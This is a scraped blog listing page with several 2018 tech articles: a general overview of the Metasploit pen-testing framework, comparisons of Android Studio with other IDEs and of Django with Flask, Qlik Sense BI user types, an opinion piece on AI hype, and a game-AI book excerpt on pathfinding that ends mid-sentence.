Tech Guides

article-image-pentest-tool-in-focus-metasploit

30 May 2018

5 min read

Pentest tool in focus: Metasploit

30 May 2018

Security over the web is of the highest priority these days as most of our transactions and storage takes place on the web. Our systems are ripe for cracking by hackers. Don’t believe me? check out the below video. How can we improve our security belts around our system? Metasploit is one solution cybersecurity professionals look at to tight-lock their security with no risk of intruders. Metasploit, an open source project, allows individuals or organizations to identify security vulnerabilities and develop a code using which network administrators can break into their own code and identify potential risks. They can then prioritize which vulnerabilities need to be addressed. The Metasploit project offers Penetration (pen) testing software Tools for automating the comparison of a program's vulnerability Anti-forensic and advanced evasion tools Some tools are also built-in the Metasploit framework. The Metasploit Framework is a collection of tools, libraries, modules and so on. It is popular among cybersecurity professionals and ethical hackers to carry out penetration testing or hacking. They can use it to exploit vulnerabilities on a network and also make Trojans, backdoors, botnets, phishing and so on. You can check out our article on 12 common malware types you should know, to know about the different malware types. The Metasploit Framework is supported by various operating systems including, Linux, MAC-OS, Windows, Android and so on. One can use metasploit in both free and paid versions, where the free version(Metasploit Framework and Metasploit community)can be used to find out basic exploits. However, a full paid version(Metasploit Pro) is preferred as it allows one to carry out deep pen-tests and other advanced features. A paid version offers: Collects integrations via remote APIs Automate several tasks, which include smart exploitation, penetration testing reports, and much more. Infiltrates dynamic payloads to evade the top antivirus solutions Also, in order to use this hacking tool, one can make use of the different interfaces it offers. Metasploit Interfaces Msfconsole Msfconsole is one of the highly popular interfaces in the metasploit framework. Once you have a hang of this interface and its syntax, it will provide a coherent access to all the options within the Metasploit Framework. Some advantages of msfconsole include: With the msfconsole, one can access all the features in the MSF Most stable and provides a console-based interface With msfconsole executing external commands is possible One can experience a full readline support, tabbing, and command completion Msfcli Msfcli enables a powerful command-line interface to the framework. Some features of this interface include: Support for the launch of exploits and auxiliary modules. Great for use in scripts and basic automation. However, one should be careful while using msfcli as variables are case-sensitive, and are assigned using an equal to (=) sign. MsfGUI Msfgui is the GUI of the framework and a tool to carry out demonstrations to clients and management. The msfgui: provides a point-and-click interface for exploitation a GTK wizard-based interface for using the metasploit framework Armitage Developed by Raphael Mudge, Armitage, is an open source Java-based frontend GUI for the metasploit framework. Its primary aim is to assist security professionals to understand hacking, by getting to know the true potential of Metasploit. Advantages of using Metasploit One can automate each phase of penetration testing Metasploit allows pentesters and cyber professionals to automate all phases within the penetration test. This is because, the amount of time required to carry out a complete and thorough pen-test is huge. Metasploit automates tasks; right from selecting the appropriate exploit to streamline the evidence collection and reporting of the attack. Credentials can be gathered and reused Credentials are the keys to any network, and the biggest prize for a penetration tester. With metasploit, one can catalog and track user credentials for reporting. Professionals and hackers can also make use of these credentials across every system in the network using a simple credential domino wizard. Become a next-Level Pen Tester If one has already worked with Metasploit framework for years together, its pro version is definitely the next step to head for. With Metasploit Pro, the expert can easily move through a network using the pivoting and antivirus evasion capabilities. They can also create instant reports on the progress and evidence. The best part is, one can seamlessly use custom scripts by going into the command line framework. Metasploit in competition with other pentesting tools Metasploit is not the only tool that offers penetration testing but it is one of the preferred ones. There are a number of other tools in the market that can give Metasploit a tough competition. Some of them include Wireshark, Nessus, Nmap, and so on. Wireshark is a famous network protocol analyzer. It can read captured information from other applications and is multiplatform. The only con it has is, it has a steep learning curve. Nessus is a vulnerability scanner and a popular tool among the professionals in security. It has a huge library of vulnerabilities and respective tests to identify them. It relies on the response from the target host to identify a breach. Here, metasploit is used as an exploitation tool to identify if the detected breach could be exploitable. Nmap (Network mapper) is a highly competent pen testing tool used for network mapping or discovery. On comparing with metasploit, it has a rudimentary GUI as compared to Metasploit. Metasploit is moving into web application security with its 3.5.0 release. The community has also added native PHP and Java payloads, which makes it easy to acquire advanced functionality through web application and Java server vulnerabilities. The community plans to port more exploits and modules to the metasploit platform. Additional modules that target embedded devices, hardware devices, etc.and BUS systems, such as K-Line could be added in the near future. 5 pen testing rules of engagement: What to consider while performing Penetration testing How to secure a private cloud using IAM Top 5 penetration testing tools for ethical hackers

0
0
34958

article-image-android-studio-how-does-it-differ-from-other-ides

Natasha Mathur

30 May 2018

5 min read

What is Android Studio and how does it differ from other IDEs?

Natasha Mathur

30 May 2018

5 min read

Android Studio is a powerful and sophisticated development environment, designed with the specific purpose of developing, testing, and packaging Android applications. It can be downloaded, along with the Android SDK, as a single package. It is a collection of tools and components. Many such tools are installed and updated independently of each other. Android Studio is not the only way to develop Android apps; there are other IDEs, such as Eclipse and NetBeans, and it is even possible to develop a complete app using nothing more than Notepad and the command line. This article is an excerpt from the book, 'Mastering Android Studio 3', written by Kyle Mew. Built for a purpose, Android Studio has attracted a growing number of third-party plugins that provide a large array of valuable functions, not available directly via the IDE. These include plugins to speed up build times, debug a project over Wi-Fi, and many more. Despite being arguably a superior tool, there are some very good reasons for having stuck with another IDE, such as Eclipse. Many developers develop for multiple platforms, which makes Eclipse a good choice of tool. Every developer has deadlines to meet, and getting to grips with unfamiliar software can slow them down considerably at first. But Android studio is the official IDE for Android studio and every android app developer should be wary of the differences between the two so that they can figure out the similarities and the differences, and see what works for them. How Android Studio differs There are many ways in which Android Studio differs from other IDEs and development tools. Some of these differences are quite subtle, such as the way support libraries are installed, and others, for instance, the build process and the UI design, are profoundly different. Before taking a closer look at the IDE itself, it is a good idea to first understand what some of these important differences are. The major ones are listed here: UI development: The most significant difference between Studio and other IDEs is its layout editor, which is far superior to any of its rivals, offering text, design, and blueprint views, and most importantly, constraint layout tools for every activity or fragment, an easy-to-use theme and style editors, and a drag-and-drop design function. The layout editor also provides many tools unavailable elsewhere, such as a comprehensive preview function for viewing layouts on a multitude of devices and simple-to-use theme and translation editors. Project structure: Although the underlying directory structure remains the same, the way Android Studio organizes each project differs considerably from its predecessors. Rather than using workspaces as in Eclipse, Studio employs modules that can more easily be worked on together without having to switch workspaces. This difference in structure may seem unusual at first, but any Eclipse user will soon see how much time it can save once it becomes familiar. Code completion and refactoring: The way that Android Studio intelligently completes code as you type makes it a delight to use. It regularly anticipates what you are about to type, and often a whole line of code can be entered with no more than two or three keystrokes. Refactoring too, is easier and more far-reaching than alternative IDEs, such as Eclipse and NetBeans. Almost anything can be renamed, from local variables to entire packages. Emulation: Studio comes equipped with a flexible virtual device editor, allowing developers to create device emulators to model any number of real-world devices. These emulators are highly customizable, both in terms of form factor and hardware configurations, and virtual devices can be downloaded from many manufacturers. Users of other IDEs will be familiar with Android AVDs already, although they will certainly appreciate the preview features found in the Design tab. Build tools: Android Studio employs the Gradle build system, which performs the same functions as the Apache Ant system that many Java developers will be familiar with. It does, however, offer a lot more flexibility and allows for customized builds, enabling developers to create APKs that can be uploaded to TestFlight, or to produce demo versions of an app, with ease. It is also the Gradle system that allows for the modular nature. Rather than each library or a third-party SDK being compiled as a JAR file, Studio builds each of these using Gradle. These are the most far-reaching differences between Android Studio and other IDEs, but there are many other features which are unique. Studio provides the powerful JUnit test facility and allows for cloud platform support and even Wi-Fi debugging. It is also considerably faster than Eclipse, which, to be fair, has to cater for a wider range of development needs, as opposed to just one, and it can run on less powerful machines. Android Studio also provides an amazing time-saving device in the form of Instant Run. This feature cleverly only builds the part of a project that has been edited, meaning that developers can test small changes to code without having to wait for a complete build to be performed for each test. This feature can bring waiting time down from minutes to almost zero. To know more about Android studio and how to build faster, smoother, and error-free Android applications, be sure to check out the book 'Mastering Android Studio 3'. The art of Android Development using Android Studio Getting started with Android Things Unit Testing apps with Android Studio

0
0
6439

article-image-self-service-business-intelligence-qlik-sense-users

Amey Varangaonkar

29 May 2018

7 min read

Four self-service business intelligence user types in Qlik Sense

Amey Varangaonkar

29 May 2018

7 min read

With the introduction of self-service to BI, there is segmentation at various levels and breaths on how self-service is conducted and to what extent. There are, quite frankly, different user types that differ from each other in level of interest, technical expertise, and the way in which they consume data. While each user will almost be unique in the way they use self-service, the user base can be divided into four different groups. In this article, we take a look at the four types of users in self-service business intelligence model. The following excerpt is taken from the book Mastering Qlik Sense, authored by Martin Mahler and Juan Ignacio Vitantonio. This book presents expert techniques to design and deploy enterprise-grade Business Intelligence solutions for your business, by leveraging the power of Qlik Sense. Power Users or Data Champions Power users are the most tech-savvy business users, who show a great interest in self-service BI. They produce and build dashboards themselves and know how to load data and process it to create a logical data model. They tend to be self-learning and carry a hybrid set of skills, usually a mixture of business knowledge and some advanced technical skills. This user group is often frustrated with existing reporting or BI solutions and finds IT inadequate in delivering the same. As a result, especially in the past, they take away data dumps from IT solutions and create their own dashboards in Excel, using advanced skills such as VBA, Visual Basic for Applications. They generally like to participate in the development process but have been unable to do so due to governance rules and a strict old-school separation of IT from the business. Self-service BI is addressing this group in particular, and identifying those users is key in reaching adoption within an organization. Within an established self-service environment, power users generally participate in committees revolving around the technical environments and represent the business interest. They also develop the bulk of the first versions of the apps, which, as part of a naturally evolving process, are then handed over to more experienced IT for them to be polished and optimized. Power users advocate the self-service BI technology and often not only demo the insights and information they achieved to extract from their data, but also the efficiency and timeliness of doing so. At the same time, they also serve as the first point of contact for other users and consumers when it comes to questions about their apps and dashboards. Sometimes they also participate in a technical advisory capacity on whether other projects are feasible to be implemented using the same technology. Within a self-service BI environment, it is safe to say that those power users are the pillars of a successful adoption. Business Users or Data Visualizers Users are frequent users of data analytics, with the main goal to extract value from the data they are presented with. They represent the group of the user base which is interested in conducting data analysis and data discovery to better understand their business in order to make better-informed decisions. Presentation and ease of use of the application are key to this type of user group and they are less interested in building new analytics themselves. That being said, some form of creating new charts and loading data is sometimes still of interest to them, albeit on a very basic level. Timeliness, the relevance of data, and the user experience are most relevant to them. They are the ones who are slicing and dicing the data and drilling down into dimensions, and who are keen to click around in the app to obtain valuable information. Usually, a group of users belong to the same department and have a power user overseeing them with regard to questions but also in receiving feedback on how the dashboard can be improved even more. Their interaction with IT is mostly limited to requesting access and resolving unexpected technical errors. Consumers or Data Readers Consumers usually form the largest user group of a self-service BI analytics solution. They are the end recipients of the insights and data analytics that have been produced and, normally, are only interested in distilled information which is presented to them in a digested form. They are usually the kind of users who are happy with a report, either digital or in printed form, which summarizes highlights and lowlights in a few pages, requiring no interaction at all. Also, they are most sensitive to the timeliness and availability of their reports. While usually the largest audience, at the same time this user group leverages the self-service capabilities of a BI tool the least. This poses a licensing challenge, as those users don’t take full advantage of the functionality on offer, but are costing the full amount in order to access the reports. It is therefore not uncommon to assign this type of user group a bucket of login access passes or not give them access to the self-service BI platform at all and give them the information they need in (digitally) printed format or within presentations, prepared by users. IT or Data Overseers IT represents the technical user group within this context, who sit in the background and develop and manage the framework within which the self-service BI solution operates. They are the backbone of the deployment and ensure the environment is set up correctly to cater for the various use cases required by the above-described user groups. At the same time, they ensure a security policy is in place and maintained and they introduce a governance framework for deployment, data quality, and best practices. They are in effect responsible for overseeing the power users and helping them with technical questions, but at the same time ensuring terms and definition as well as the look and feel is consistent and maintained across all apps. With self-service BI, IT plays a lesser role in actually developing the dashboards but assumes a more mentoring position, where training, consultation, and advisory in best practices are conducted. While working closely with power users, IT also provides technical support to users and liaises with the IT infrastructure to ensure the server infrastructure is fit for purpose and up and running to serve the users. This also includes upgrading the platform where required and enriching it with additional functionality if and when available. Bringing them together The previous four groups can be distinguished within a typical enterprise environment; however, this is not to say hybrid or fewer user groups are not viable models for self-service BI. It is an evolutionary process in how an organization adapts self-service data analytics with a lot of dependencies on available skills, competing established solutions, culture, and appetite on new technologies. It usually begins with IT being the first users in a newly deployed self-service environment, not only setting up the infrastructure but also developing the first apps for a couple of consumers. Power users then follow up; generally, they are the business sponsors themselves who are often big fans of data analytics, modifying the app to their liking and promoting it to their users. The user base emerges with the success of the solution, where analytics are integrated into their business as the usual process. The last group, the consumers, is mostly the last type of user group that is established, which more often than not doesn’t have actual access to the platform itself, but rather receives printouts, email summaries with screenshots, or PowerPoint presentations. Due to licensing cost and the size of the consumer audience, it is not always easy to give them access to the self-service platform; hence, most of the time, an automated and streamlined PDF printing process is the most elegant solution to cater to this type of user group. At the same time, the size of the deployment also determines the number of various user groups. In small enterprise environments, it will be mostly power users and IT who will be using self-service. This greatly simplifies the approach as well as the setup considerations. If you found the above excerpt useful, make sure you check out the book Mastering Qlik Sense to learn helpful tips and tricks to perform effective Business Intelligence using Qlik Sense. Read more: How Qlik Sense is driving self-service Business Intelligence What we learned from Qlik Qonnections 2018 How self-service analytics is changing modern-day businesses

0
0
23138

article-image-ai-deserve-to-be-so-overhyped

Aaron Lazar

28 May 2018

6 min read

Does AI deserve to be so Overhyped?

Aaron Lazar

28 May 2018

6 min read

The short answer is yes, and no. The long answer is, well, read on to find out. Several have been asking the question, including myself, wondering whether Artificial Intelligence is just another passing fad like maybe the Google Glass or nano technology. The hype for AI began over the past few years, although if you actually look back at the 60’s it seems to have started way back then. In the early 90s and all the way down to the early 2000’s, a lot of media and television shows were talking about AI quite a bit. Going 25 centuries even further back, Aristotle speaks of not just thinking machines but goes on to talk of autonomous ones in his book, Politics: for if every instrument, at command, or from a preconception of its master's will, could accomplish its work (as the story goes of the statues of Daedalus; or what the poet tells us of the tripods of Vulcan, "that they moved of their own accord into the assembly of the gods "), the shuttle would then weave, and the lyre play of itself; nor would the architect want servants, or the [1254a] master slaves. Aristotle, Politics: A treatise on Government, Book 1, Chapter 4 This imagery of AI has managed to sink into our subconscious minds over the centuries propelling creative work, academic research and industrial revolutions toward that goal. The thought of giving machines a mind of their own, existed quite long ago, but recent advancements in technology have made it much clearer and realistic. The Rise of the Machines The year is 2018. The 4th Industrial Revolution is happening and intelligent automation has taken over. This is the point where I say no, AI is not overhyped. General Electric, for example, is a billion dollar manufacturing company that has already invested in AI. GE Digital has AI systems running through several automated systems. They even have their own IIoT platform called Predix. Similarly, in the field of healthcare, the implementation of AI is growing in leaps and bounds. The Google Deepmind project is able to process millions of medical records within minutes. Although this kind of research is in its early phase, Google is working closely with the Moorfields Eye Hospital NHS Foundation Trust to implement AI and improve eye treatment. AI startups focused on healthcare and other allied areas such as genetic engineering are some of the highly invested and venture capital supported ones in recent times. Computer Vision or image recognition is one field where AI has really proven its power. Analysing datasets like iris has never been easier, paving way for more advanced use cases like automated quality checks in manufacturing units. Another interesting field is Healthcare, where AI has helped sift through tonnes of data, helping doctors diagnose illnesses quicker, manufacture more effective and responsive drugs, and in patient monitoring. The list is endless, clearly showing that AI has made its mark in several industries. Back (up) to the Future Now, if you talk about the commercial implementations of AI, they’re still quite far fetched at the moment. Take the same Computer Vision application for example. Its implementation will be a huge breakthrough in autonomous vehicles. But if researchers have managed to obtain an 80% accuracy for object recognition on roads, the battle is not close to being won! Even if they do improve, do you think driverless vehicles are ready to drive in the snow, through the rain or even storms? I remember a few years ago, Business Process Outsourcing was one industry, at least in India, that was quite fearful of the entry of AI and autonomous systems that might take over their jobs. Machines are only capable of performing 60-70% of the BPO processes in Insurance, and with changing customer requirements and simultaneously falling patience levels, these numbers are terrible! It looks like the end of Moore’s law is here, for AI I mean. Well, you can’t really expect AI to have the same exponential growth that computers did, decades ago. There are a lot of unmet expectations in several fields, which has a considerable number of people thinking that AI isn’t going to solve their problems now, and they’re right. It is probably going to take a few more years to mature, making it a thing of the future, not of the present. Is AI overhyped now? Yeah, maybe? What I think Someone once said, hype is a double-edged sword. If it’s not enough, innovation may become obscure and if it’s too much, expectations will become unreasonable. It’s true that AI has several beneficial use cases, but what about fairness of such systems? Will machines continue to think the way they’re supposed to or will they start finding their own missions that don’t involve benefits to the human race? At the same time, there’s also a question of security and data privacy. GDPR will come into effect in a few days, but what about the prevailing issues of internet security? I had an interesting discussion with a colleague yesterday. We were talking about what the impact of AI could be for us as end-customers, in a developing and young country like India. Do we really need to fear losing our jobs, will we be able to reap the benefits of AI directly or would it be an indirect impact? The answer is, probably yes, but not so soon. If we drew up the hierarchy of needs pyramid for AI, it would look something like the above. For each field to fully leverage AI, it’s going to involve several stages like collecting data, storing it effectively, exploring it, then aggregating it, optimising it with the help of algorithms and then finally achieving AI. That’s bound to take a LOT of time! Honestly speaking, a country like India lacks as much implementation of AI in several fields. The major customers of AI, apart from some industrial giants, will obviously be the government. Although, that is sure to take at least a decade or so, keeping in mind the several aspects to be accomplished first. In the meantime, buddying AI developers and engineers are scurrying to skill themselves up in the race to be in the cream of the crowd! Similarly, what about the rest of the world? Well, I can’t speak for everyone, but if you ask me, AI is a really promising technology and I think we need to give it some time; allow the industries and organisations investing in it to take enough time to let it evolve and ultimately benefit us customers, one way or another. You can now make music with AI thanks to Magenta.js Splunk leverages AI in its monitoring tools

0
0
5194

article-image-python-web-development-django-vs-flask-2018

Aaron Lazar

28 May 2018

7 min read

Python web development: Django vs Flask in 2018

Aaron Lazar

28 May 2018

7 min read

A colleague of mine, wrote an article over two years ago, talking about the two top Python web frameworks, Django and Flask. It’s 2018 now, and a lot has changed in the IT world. There have been a couple of frameworks that emerged or gained popularity in the last 3 years, like Bottle or CherryPy, for example. However, Django and Flask have managed to stand their ground and have continued to remain as the top 2 Python frameworks. Moreover, there have been some major breakthroughs in web application architecture like the rise of Microservices, that has in turn pushed the growth of newer architectures like Serverless and Cloud-Native. I thought it would be a good idea to present a more modern comparison of these two frameworks, to help you take an informed decision on which one you should be choosing for your application development. So before we dive into ripping these frameworks apart, let’s briefly go over a few factors we’ll be considering while evaluating them. Here’s what I got in mind, in no particular order: Ease of use Popularity Community support Job market Performance Modern Architecture support Ease of use This is something l like to cover first, because I know it’s really important for developers who are just starting out, to assess the learning curve before they attempt to scale it. When I’m talking about ease of use, I’m talking about how easy it is to get started with using the tool in your day to day projects. Flask, like it’s webpage, is a very simple tool to learn, simply because it’s built to be simple. Moreover, the framework is un-opinionated, meaning that it will allow you to implement things the way you choose to, without throwing a fuss. This is really important when you’re starting out. You don’t want to run into too much issues that will break your confidence as a developer. On the other hand, Django is a great framework to learn too. While several Python developers will disagree with me, I would say Django is a pretty complex framework, especially for a newbie. Now this is not all that bad, right. I mean, especially when you’re building a large project, you want to be the one holding the reins. If you’re starting out with some basic projects then, it may be wise not to choose Django. The way I see it, learning Flask first will allow you to learn Django much faster. Popularity Both frameworks are quite popular, with Django starring at 34k on Github, and Flask having a slight edge at 36k. If you take a look at the Google trends, both tools follow a pretty similar trend, with Django’s volume much higher, owing to its longer existence. Source: SEM Rush As mentioned before, Flask is more popular among beginners and those who want to build basic websites easily. On the other hand, Django is more popular among the professionals who have years of experience building robust websites. Community Support and Documentation In terms of community support, we’re looking at how involved the community is, in developing the tool and providing support to those who need it. This is quite important for someone who’s starting out with a tool, or for that matter, when there’s a new version releasing and you need to keep yourself up to date.. Django features 170k tags on Stackoverflow, which is over 7 times that of Flask, which stands at 21k. Although Django is a clear winner in terms of numbers, both mailing lists are quite active and you can receive all the help you need, quite easily. When it comes to documentation, Django has some solid documentation that can help you get up and running in no time. On the other hand, Flask has good documentation too, but you usually have to do some digging to find what you’re looking for. Job Scenes Jobs are really important especially if you’re looking for a corporate one It’s quite natural that the organization that’s hiring you will already be working with a particular stack and they will expect you to have those skills before you step in. Django records around 2k jobs on Indeed in the USA, while Flask records exactly half that amount. A couple of years ago, the situation was pretty much the same; Django was a prime requirement, while Flask had just started gaining popularity. You’ll find a comment stating that “Picking up Flask might be a tad easier then Django, but for Django you will have more job openings” Itjobswatch.uk lists Django as the 2nd most needed Skill for a Python Developer, whereas Flask is way down at 20. Source: itjobswatch.uk Clearly Django is in more demand that Flask. However, if you are an independent developer, you’re still free to choose the framework you wish to work with. Performance Honestly speaking, Flask is a microframework, which means it delivers a much better performance in terms of speed. This is also because in Flask, you could write 10k lines of code, for something that would take 24k lines in Django. Response time comparison for data from remote server: Django vs Flask In the above image we see how both tools perform in terms of loading a response from the server and then returning it. Both tools are pretty much the same, but Flask has a slight edge over Django. Load time comparison from database with ORM: Django vs Flask In this image, we see how the gap between the tools is quite large, with Flask being much more efficient in loading data from the database. When we talk about performance, we also need to consider the power each framework provides you when you want to build large apps. Django is a clear winner here, as it allows you to build massive, enterprise grade applications. Django serves as a full-stack framework, which can easily be integrated with JavaScript to build great applications. On the other hand, Flask is not suitable for large applications. The JetBrains Python Developer Survey revealed that Django was a more preferred option among the respondents. Jetbrains Python Developer Survey 2017 Modern Architecture Support The monolith has been broken and microservices have risen. What’s interesting is that although applications are huge, they’re now composed of smaller services working together to make up the actual application. While you would think Django would be a great framework to build microservices, it turns out that Flask serves much better, thanks to its lightweight architecture and simplicity. While you work on a huge enterprise application, you might find Flask being interwoven wherever a light framework works best. Here’s the story of one company that ditched Django for microservices. I’m not going to score these tools because they’re both awesome in their own right. The difference arises when you need to choose one for your projects and it’s quite evident that Flask should be your choice when you’re working on a small project or maybe a smaller application built into a larger one, maybe a blog or a small website or a web service. Although, if you’re on the A team, making a super awesome website for maybe, Facebook or a billion dollar enterprise, instead of going the Django unchained route, choose Django with a hint of Flask added in, for all the right reasons. :) Django recently hit version 2.0 last year, while Flask hit version 1.0 last month. Here’s some great resources to get you up and running with Django and Flask. So what are you waiting for? Go build that website! Why functional programming in Python matters Should you move to Python 3.7 Why is Python so good for AI and Machine Learning?

0
0
15902

Kunal Chaudhari

25 May 2018

21 min read

AI for game developers: 7 ways AI can take your game to the next level

Kunal Chaudhari

25 May 2018

21 min read

Artificial Intelligence (AI) is a rich and complex topic. At first glance, it can seem intimidating. The uses for it are diverse, ranging from robotics to statistics and to (more relevantly for us) entertainment, more specifically, video games. In this article, we will get to know the fundamentals of Artificial intelligence and why it is important for game developers. We have also covered a quick background on AI in academics, traditional domain, and game-specific applications. We will also look at the following: Application and implementation of AI in games is different from other domains Special requirements for AI in games Basic AI patterns used in games This article is an excerpt from a book written by Ray Barrera, Aung Sithu Kyaw, and Thet Naing Swe titled Unity 2017 Game AI Programming - Third Edition. This book would help you to create fun and unbelievable AI entities in your games with A*, Fuzzy logic and NavMesh with Unity 2017. Leveling up your game with AI AI in games dates back all the way to the earliest games, even as far back as Namco's arcade hit Pac-Man. The AI was rudimentary at best, but even in Pac-Man, each of the enemies—Blinky, Pinky, Inky, and Clyde—had unique behaviors that challenged the player in different ways. Learning those behaviors and reacting to them adds a huge amount of depth to the game and keeps players coming back, even after over 30 years since its release. It's the job of a good game designer to make the game challenging enough to be engaging, but not so difficult that a player can never win. To this end, AI is a fantastic tool that can help abstract the patterns that entities in games follow to make them seem more organic, alive, and real. Much like an animator through each frame or an artist through his brush, a designer or programmer can breathe life into their creations via clever use of the AI techniques covered in this article. The role of AI in games is to make games fun by providing challenging entities to compete with, and interesting non-player characters (NPCs) that behave realistically inside the game world. The objective here is not to replicate the whole thought process of humans or animals, but merely to sell the illusion of life and make NPCs seem intelligent by having them react to the changing situations inside the game world in a way that makes sense to the player. Technology allows us to design and create intricate patterns and behaviors, but we're not yet at the point where AI in games even begins to resemble true human behavior. While smaller, more powerful chips, buckets of memory, and even distributed computing have given programmers a much higher computational ceiling to dedicate to AI, at the end of the day, resources are still shared between other operations such as graphics rendering, physics simulation, audio processing, animation, and others, all in real time. All these systems have to play nice with each other to achieve a steady frame rate throughout the game. Like all the other disciplines in game development, optimizing AI calculations remains a huge challenge for AI developers. Using AI in Unity In this section, we'll walk you through the AI techniques being used in different types of games. Unity is a flexible engine that provides a number of approaches to implement AI patterns. Some are ready to go out of the box, so to speak, while others we'll have to build from scratch. We'll focus on implementing the most essential AI patterns within Unity so that you can get your game's AI entities up and running quickly. Learning and implementing the techniques within this article will serve as a fundamental first step in the vast world of AI. Many of the concepts we will cover in this article, such as pathfinding and Navigation Meshes, are interconnected and build on top of one another. For this reason, it's important to get the fundamentals right first before digging into the high-level APIs that Unity provides. Defining the agent Before jumping into our first technique, we should be clear on a key term—the agent. An agent, as it relates to AI, is our artificially intelligent entity. When we talk about our AI, we're not specifically referring to a character, but an entity that displays complex behavior patterns, which we can refer to as non-random, or in other words, intelligent. This entity can be a character, creature, vehicle, or anything else. The agent is the autonomous entity, executing the patterns and behaviors we'll be covering. With that out of the way, let's jump in. Finite State Machines Finite State Machines (FSM) can be considered one of the simplest AI models, and they are commonly used in games. A state machine basically consists of a set number of states that are connected in a graph by the transitions between them. A game entity starts with an initial state and then looks out for the events and rules that will trigger a transition to another state. A game entity can only be in exactly one state at any given time. For example, let's take a look at an AI guard character in a typical shooting game. Its states could be as simple as patrolling, chasing, and shooting: There are basically four components in a simple FSM: States: This component defines a set of distinct states that a game entity or an NPC can choose from (patrol, chase, and shoot) Transitions: This component defines relations between different states Rules: This component is used to trigger a state transition (player on sight, close enough to attack, and lost/killed player) Events: This is the component that will trigger to check the rules (guard's visible area, distance to the player, and so on) FSMs are commonly used go-to AI patterns in game development because they are relatively easy to implement, visualize, and understand. Using simple if/else statements or switch statements, we can easily implement an FSM. It can get messy as we start to have more states and more transitions. Seeing the world through our agent's eyes In order to make our AI convincing, our agent needs to be able to respond to the events around him, the environment, the player, and even other agents. Much like real living organisms, our agent can rely on sight, sound, and other "physical" stimuli. However, we have the advantage of being able to access much more data within our game than a real organism can from their surroundings, such as the player's location, regardless of whether or not they are in the vicinity, their inventory, the location of items around the world, and any variable you chose to expose to that agent in your code: In the preceding diagram, our agent's field of vision is represented by the cone in front of it, and its hearing range is represented by the grey circle surrounding it: Vision, sound, and other senses can be thought of, at their most essential level, as data. Vision is just light particles, sound is just vibrations, and so on. While we don't need to replicate the complexity of a constant stream of light particles bouncing around and entering our agent's eyes, we can still model the data in a way that produces believable results. As you might imagine, we can similarly model other sensory systems, and not just the ones used for biological beings such as sight, sound, or smell, but even digital and mechanical systems that can be used by enemy robots or towers, for example sonar and radar. If you've ever played Metal Gear Solid, then you've definitely seen these concepts in action—an enemy's field of vision is denoted on the player's mini map as cone-shaped fields of view. Enter the cone and an exclamation mark appears over the enemy's head, followed by an unmistakable chime, letting the player know that they've been spotted. Path following and steering Sometimes, we want our AI characters to roam around in the game world, following a roughly-guided or thoroughly-defined path. For example, in a racing game, the AI opponents need to navigate the road. In an RTS game, your units need to be able to get from wherever they are to the location you tell them navigating through the terrain and around each other. To appear intelligent, our agents need to be able to determine where they are going, and if they can reach that point, they should be able to route the most efficient path and modify that path if an obstacle appears as they navigate. Even path following and steering can be represented via a finite state machine. You will then see how these systems begin to tie in. In this article, we will cover the primary methods of pathfinding and navigation, starting with our own implementation of an A* Pathfinding System, followed by an overview of Unity's built-in Navigation Mesh (NavMesh) feature. Dijkstra's algorithm While perhaps not quite as popular as A* Pathfinding (which we will cover next), it's crucial to understand Dijkstra's algorithm, as it lays the foundation for other similar approaches to finding the shortest path between two nodes in a graph. The algorithm was published by Edsger W. Dijkstra in 1959. Dijkstra was a computer scientist, and though he may be best known for his namesake algorithm, he also had a hand in developing other important computing concepts, such as the semaphore. It might be fair to say Dijkstra probably didn't have StarCraft in mind when developing his algorithm, but the concepts translate beautifully to game AI programming and remain relevant to this day. So what does the algorithm actually do? In a nutshell, it computes the shortest path between two nodes along a graph by assigning a value to each connected node based on distance. The starting node is given a value of zero. As the algorithm traverses through a list of connected nodes that have not been visited, it calculates the distance to it and assigns the value to that node. If the node had already been assigned a value in a prior iteration of the loop, it keeps the smallest value. The algorithm then selects the connected node with the smallest distance value, and marks the previously selected node as visited, so it will no longer be considered. The process repeats until all nodes have been visited. With this information, you can then calculate the shortest path. Need help wrapping your head around Dijkstra's algorithm? The University of San Francisco has created a handy visualization tool: ;https://www.cs.usfca.edu/~galles/visualization/Dijkstra.html. While Dijkstra's algorithm is perfectly capable, variants of it have been developed that can solve the problem more efficiently. A* is one such algorithm, and it's one of the most widely used pathfinding algorithms in games, due to its speed advantage over Dijkstra's original version. Using A* Pathfinding There are many games in which you can find monsters or enemies that follow the player, or go to a particular point while avoiding obstacles. For example, let's take a typical RTS game. You can select a group of units and click on a location you want them to move to, or click on the enemy units to attack them. Your units then need to find a way to reach the goal without colliding with the obstacles or avoid them as intelligently as possible. The enemy units also need to be able to do the same. Obstacles could be different for different units, terrain, or other in-game entities. For example, an air force unit might be able to pass over a mountain, while the ground or artillery units need to find a way around it. A* (pronounced "A star") is a pathfinding algorithm that is widely used in games because of its performance and accuracy. Let's take a look at an example to see how it works. Let's say we want our unit to move from point A to point B, but there's a wall in the way and it can't go straight towards the target. So, it needs to find a way to get to point B while avoiding the wall. The following figure illustrates this scenario: In order to find the path from point A to point B, we need to know more about the map, such as the position of the obstacles. To do this, we can split our whole map into small tiles, representing the whole map in a grid format. The tiles can also be other shapes such as hexagons and triangles. Representing the whole map in a grid makes the search area more simplified, and this is an important step in pathfinding. We can now reference our map in a small 2D array: Once our map is represented by a set of tiles, we can start searching for the best path to reach the target by calculating the movement score of each tile adjacent to the starting tile, which is a tile on the map not occupied by an obstacle, and then choosing the tile with the lowest cost. A* Pathfinding calculates the cost to move across the tiles A* is an important pattern to know when it comes to pathfinding, but Unity also gives us a couple of features right out of the box, such as automatic Navigation Mesh generation and the NavMesh agent. These features make implementing pathfinding in your games a walk in the park (no pun intended). Whether you choose to implement your own A* solution or simply go with Unity's built-in NavMesh feature will depend on your project's needs. Each option has its own pros and cons, but ultimately, knowing about both will allow you to make the best possible choice. With that said, let's have a quick look at NavMesh. IDA* Pathfinding IDA* star stands for iterative deepening A*. It is a depth-first permutation of A* with a lower overall memory cost, but is generally considered costlier in terms of time. Whereas A* keeps multiple nodes in memory at a time, IDA* does not since it is a depth-first search. For this reason, IDA* may visit the same node multiple times, leading to a higher time cost. Either solution will give you the shortest path between two nodes. In instances where the graph is too big for A* in terms of memory, IDA* is preferable, but it is generally accepted that A* is good enough for most use cases in games. Using Navigation Mesh Now that we've taken a brief look at A*, let's look at some possible scenarios where we might find NavMesh a fitting approach to calculate the grid. One thing that you might notice is that using a simple grid in A* requires quite a number of computations to get a path that is the shortest to the target and, at the same time, avoids the obstacles. So, to make it cheaper and easier for AI characters to find a path, people came up with the idea of using waypoints as a guide to move AI characters from the start point to the target point. Let's say we want to move our AI character from point A to point B and we've set up three waypoints, as shown in the following figure: All we have to do now is to pick up the nearest waypoint 